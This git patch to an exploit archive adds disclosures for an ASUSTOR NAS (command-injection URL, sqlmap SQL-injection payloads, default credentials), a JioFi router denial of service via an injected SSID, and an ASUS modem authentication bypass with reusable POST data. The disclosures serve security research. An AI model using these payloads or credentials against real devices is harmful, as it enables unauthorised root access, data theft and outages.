From 2e282df4a8171a716c214e6e127e2c26722e8d7c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 16 Aug 2018 05:02:01 +0000 Subject: [PATCH] DB: 2018-08-16 3 changes to exploits/shellcodes JioFi 4G M2S 1.0.2 - Denial of Service (PoC) ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass --- exploits/cgi/webapps/45200.txt | 127 ++++++++++++++++++++++++++++ exploits/hardware/dos/45199.txt | 24 ++++++ exploits/hardware/webapps/45201.txt | 21 +++++ files_exploits.csv | 3 + 4 files changed, 175 insertions(+) create mode 100644 exploits/cgi/webapps/45200.txt create mode 100644 exploits/hardware/dos/45199.txt create mode 100644 exploits/hardware/webapps/45201.txt diff --git a/exploits/cgi/webapps/45200.txt b/exploits/cgi/webapps/45200.txt new file mode 100644 index 000000000..55928b123 --- /dev/null +++ b/exploits/cgi/webapps/45200.txt @@ -0,0 +1,127 @@ +Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds +Vendor - https://www.asustor.com/ +Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf + +Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from +multiple critical vulnerabilities. The vulnerabilities were submitted +to Asustor in January and February 2018. Several follow-up requests +were made in an attempt to obtain vendor acknowledgement, however no +correspondance was ever received. Nevertheless, the vendor did patch +the RCE issue in the 3.1.3 ADM release on May 31, 2018. + +Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3. +----------------------------------------------------------------------------------- + +CVE-2018-11510 +Remote Command Execution (Unauthenticated) +CWE-78 - Improper Neutralization of Special Elements used in an OS Command +ASUSTOR ADM - 3.1.0.RFQ3 +------------------------------------------ + +Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an +unauthenticated remote code execution vulnerability in the +portal/apis/aggrecate_js.cgi file by embedding OS commands in the +'script' parameter. The application fails to santitize user input +after the cgi file executes a call to a local shell script. + +Example POC: +https://:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22 + +Exploitation of this vulnerability allows an attacker execution of +arbitrary commands on the host operating system, as the root user, +remotely and unauthenticated. This is a complete compromise of the +appliance. + +Exploits with Metasploit module can be found here: +https://github.com/mefulton/CVE-2018-11510/ +------------------------------------------------------------------------------------ + +CVE-2018-11511 +Blind SQL Injections +CWE-89: Improper Neutralization of Special Elements used in an SQL Command +ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3 +------------------------------------------ + +Weakness : The tree list functionality in the photo gallery +application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection +vulnerability that affects the 'album_id' or 'scope' parameter via a +photo-gallery/api/album/tree_lists/ URI. + +POC +sqlmap -u "https:///photo-gallery/api/album/tree_lists/" +--data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" + --random-agent --risk=2 --dbms=mysql + +Parameter: album_id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: album_id=106299411 AND +4644=4644&start=0&limit=100&order=name_asc&api=v2 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: album_id=106299411 AND +SLEEP(5)&start=0&limit=100&order=name_asc&api=v2 + + +sqlmap -u "https://IP/photo-gallery/api/photo/search/" +--data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2" +--random-agent --dbms=mysql --risk=2 + +Parameter: scope (POST) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: keyword=jpg&scope=106299414 AND +SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2 +------------------------------------------------------------------------------------ + +CVE-2018-11509 +Default credentials and remote access (Multiple Applications) +CWE-255 Credentials Management +ASUSTOR ADM 3.1.0.RFQ3 +------------------------------------------ + +Weakness : When the end user completes setup for the ASUSTOR Nas +appliance, a single congratulations web page appears, usually on port +80, stating setup is complete. This "setup complete" web page however +is served publicly, and is available to anyone with no authentication. +>From this page it is possible to access all of the add-on applications +the end usr installs on the NAS, which are available from their online +repository, by simply browsing to each add-on directory. + +For many of these apps, for example phpmyadmin. virtualbox, owncloud, +photo-gallery, etc., the files are installed under the /volume1/Web/ +folder, which is t the same directory as the 'setup complete' page is +located. + +URL http:///phpmyadmin/ username/password - root:admin +URL http:///virtualbox/ username/password - admin:admin +URL http:///wordpress/ setup file available + +The application does prompt the user to change the admin account for +the NAS itself, however, the end user is never prompted to change the +default passwords on the add-on applications. + +This allows an attacker root level access to the application which in +turn can be used to upload a webshell onto the appliance. It also +allow access to all data the end user uploads to the NAS. + +Furthermore, the NAS itself has a default account nvradmin, which has +permission to log into the admin portal. While the nvradmin account +does not have most admin permissions, it still allows an attacker to +access many of the browser file functions, and gain a foothold on the +appliance. + +URL http://:8001/portal/ username/password nvradmin:nvradmin + +An attacker can determine installed applications and attack default +credentials that are not changed upon NAS initialization, which +enables them to compromise end user data or gain root access on the +appliance. +----------------------------------------------------------------------------------- + +[Researchers] +Kyle Lovett - (twitter - @SquirrelBuddha) +Matthew Fulton (twitter - @haqur) +https://www.purehacking.com/blog/matthew-fulton/ +https://github.com/mefulton/CVE-2018-11510/ \ No newline at end of file diff --git a/exploits/hardware/dos/45199.txt b/exploits/hardware/dos/45199.txt new file mode 100644 index 000000000..9702094f5 --- /dev/null +++ b/exploits/hardware/dos/45199.txt @@ -0,0 +1,24 @@ +# Exploit Title: JioFi 4G M2S 1.0.2 - Denial of Service (PoC) +# Exploit Author: Vikas Chaudhary +# Date: 2018-07-26 +# Vendor Homepage: https://www.jio.com/ +# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 +# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router +# Category: Hardware +# Tested on: Windows 10 +# CVE: CVE-2018-15181 + +# Proof Of Concept: +01- First Open BurpSuite +02- Make Intercept on +03 -Go to your Wifi Router Gateway and log in [i.e http://192.168.225.1 ] +04- Go To => Setting=> WiFi +06- In SSID type "Testing" and in Security Key type "12345678" . +06- Click on Apply +07- Burp will Capture the Intercepts. +08- Copy this code "onmouseover=alert(1) and paste it after the SSID name and Security Key +09- You will see that your Net connection will lost and Router will shutdown and Restart.. +10- The Router will RESTART and your SSID name will change to this "onmouseover=alert(1)// +11- Now again go to Wifi router gateway and loged in +12- You will see that the SSID name and Security Key will be Blank +13- Again try to Change the SSID name - YOU CAN'T , If you force it to change , You have to OPEN Your Wireless Security and that is unsecure . (Open wifi=> Without Password) \ No newline at end of file diff --git a/exploits/hardware/webapps/45201.txt b/exploits/hardware/webapps/45201.txt new file mode 100644 index 000000000..43ff491b7 --- /dev/null +++ b/exploits/hardware/webapps/45201.txt @@ -0,0 +1,21 @@ +# Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass +# Author: AmnBAN team +# Date: 2018-08-06 +# Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/ +# Sofrware version: 1.1.2.2_17 +# CVE: N/A + +# 1. Description: +# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization +# parameter in post data, that use for authorization access to admin panel, +# the data of this parameter is not fully random and you can use old data +# or data of another device to access admin panel. + +# 2. Proof of Concept: +# Browse http:///login.cgi + +# Send this post data: +group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D + +# Or this post data: +group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 43cebfc4d..c4f621de8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6045,6 +6045,7 @@ id,file,description,date,author,type,platform,port 45186,exploits/windows/dos/45186.py,"Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)",2018-08-13,"Javier Enrique Rodriguez Gutierrez",dos,windows, 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware, 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86, +45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39797,3 +39798,5 @@ id,file,description,date,author,type,platform,port 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple, 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux, 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848 +45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001 +45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,